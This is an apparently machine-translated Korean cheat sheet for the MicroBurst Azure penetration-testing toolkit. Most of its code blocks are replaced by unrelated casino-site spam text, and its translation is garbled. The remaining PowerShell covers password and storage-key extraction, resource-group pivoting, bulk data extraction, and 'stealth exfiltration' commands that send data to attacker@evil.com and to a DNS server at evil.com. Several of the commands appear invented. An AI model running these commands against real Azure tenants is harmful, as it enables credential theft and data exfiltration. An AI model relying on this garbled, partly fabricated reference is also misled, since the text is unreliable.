콘텐츠로 이동

MicroBurst Azure 보안 테스트 툴킷 열 시트

제품정보

MicroBurst는 Microsoft Azure 보안을 평가하기위한 NetSPI에 의해 개발 된 PowerShell 스크립트 모음입니다. Azure 서비스 발견, 특권 에스컬레이션, 측면 운동 및 데이터 여과에 대한 도구가 포함되어 있습니다. Azure 침투 테스트를 위한 종합 툴킷.

· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.

설치하기

PowerShell 갤러리 설치

카지노사이트

수동 설치

카지노사이트

Git 설치

카지노사이트

기본 사용

모듈 설정

카지노사이트

인증현황

카지노사이트

명령 참조

Reconnaissance 기능

| | Function | Description | | | --- | --- | | | Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs | | | | Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains | | | | Get-AzurePasswords | Extract passwords from Azure resources | | | | Get-AzureDomainInfo | Get domain information | | | | Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs | |

저장 계정 기능

| | Function | Description | | | --- | --- | | | Invoke-EnumerateAzureBlobs | Find accessible storage blobs | | | | Get-AzureBlobFiles | Download files from storage | | | | Invoke-AzureStorageAccountEnum | Enumerate storage accounts | | | | Get-AzureStorageAccountKeys | Extract storage account keys | |

가상 머신 기능

| | Function | Description | | | --- | --- | | | Invoke-AzureRmVmBulkCMD | Bulk command execution | | | | Get-AzureVMDisk | Access VM disk information | | | | Invoke-AzureVMUserDataEnum | Enumerate VM user data | | | | Get-AzureVMExtensionSettings | Get VM extension settings | |

Azure 스토리지

Blob 스토리지 디스커버리

카지노사이트

저장 계정 Enumeration

카지노사이트

파일 공유 Enumeration

카지노사이트

Subdomain 및 서비스 디스커버리

Azure Subdomain 사용

카지노사이트

서비스 Discovery

카지노사이트

DNS 환경

ο 회원 관리

가상 머신 폭발

VM 명령 실행

카지노사이트

VM 디스크 액세스

카지노사이트

VM 연장 폭발

카지노사이트

Credential 및 비밀 추출

비밀번호 추출

카지노사이트

인증서 추출

카지노사이트

제품 설명 데이터 추출

카지노사이트

데이터베이스 Exploitation

SQL 데이터베이스

카지노사이트

SQL 데이터베이스 액세스

카지노사이트

CosmosDB 폭발

오프화이트

웹 신청 Exploitation

웹 앱 축소

카지노사이트

웹 앱 평가

오프화이트

기능 앱 평가

카지노사이트

Privilege 확장

역할 할당

카지노사이트

서비스 Principal 뚱 베어

카지노사이트

관리 Identity 폭발

카지노사이트

옆 운동

크로스 구독 오시는 길

카지노사이트

Cross-Tenant 액세스

카지노사이트

리소스 그룹 Pivoting

```powershell

Enumerate resource groups

Get-AzureResourceGroups -SubscriptionId "subscription-id"

Find resources with weak permissions

Find-AzureWeakPermissions -ResourceGroupName "rg-name"

Pivot through resource groups

Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```의 경우

자료 Exfiltration

대량 데이터 추출

```powershell

Extract all accessible data

Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"

Extract specific data types

Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"

Extract with compression

Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```에 대하여

스텔스 Exfiltration

```powershell

Exfiltrate via storage account

Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"

Exfiltrate via email

Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"

Exfiltrate via DNS

Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```의 경우

자동화 및 스크립트

자동화된 평가 스크립트

```powershell

Comprehensive Azure assessment

param( [string]$SubscriptionId, [string]$OutputPath = "C:\AzureAssessment" )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force

Authenticate

Connect-AzAccount

Set subscription context

Set-AzContext -SubscriptionId $SubscriptionId

Enumerate subdomains

Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name $subdomains|Out-File "$OutputPath\subdomains.txt"

Enumerate storage blobs

Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name $blobs|Out-File "$OutputPath\blobs.txt"

Extract passwords

Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId $passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation

Get VM information

Write-Host "Gathering VM information..." $vms = Get-AzVM $vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation

Generate summary report

$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}

| $summary | ConvertTo-Json | Out-File "$OutputPath\summary.json" |

Write-Host "Assessment completed. Results saved to $OutputPath" ```에 대하여

연속 모니터링

```powershell

Continuous Azure monitoring

param( [int]$IntervalMinutes = 60, [string]$LogPath = "C:\AzureMonitoring\monitor.log" )

while ($true) \\{ $timestamp = Get-Date Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append

try \\\\{
    # Check for new storage accounts
    $newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newStorage) \\\\{
        Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for new VMs
    $newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newVMs) \\\\{
        Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for new role assignments
    $newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newRoles) \\\\{
        Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}
\\\\}
catch \\\\{
    Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}

Start-Sleep -Seconds ($IntervalMinutes * 60)

\\} ```의 경우

문제 해결

인증 문제

카지노사이트

모듈 문제

카지노사이트

제출 문제

카지노사이트

다른 도구와 통합

BloodHound 통합

카지노사이트

Metasploit 통합

카지노사이트

지원하다


이 속임수 시트는 MicroBurst를 사용하여 포괄적 인 참조를 제공합니다. 항상 Azure 보안 평가를 수행하기 전에 적절한 권한이 있습니다. 필수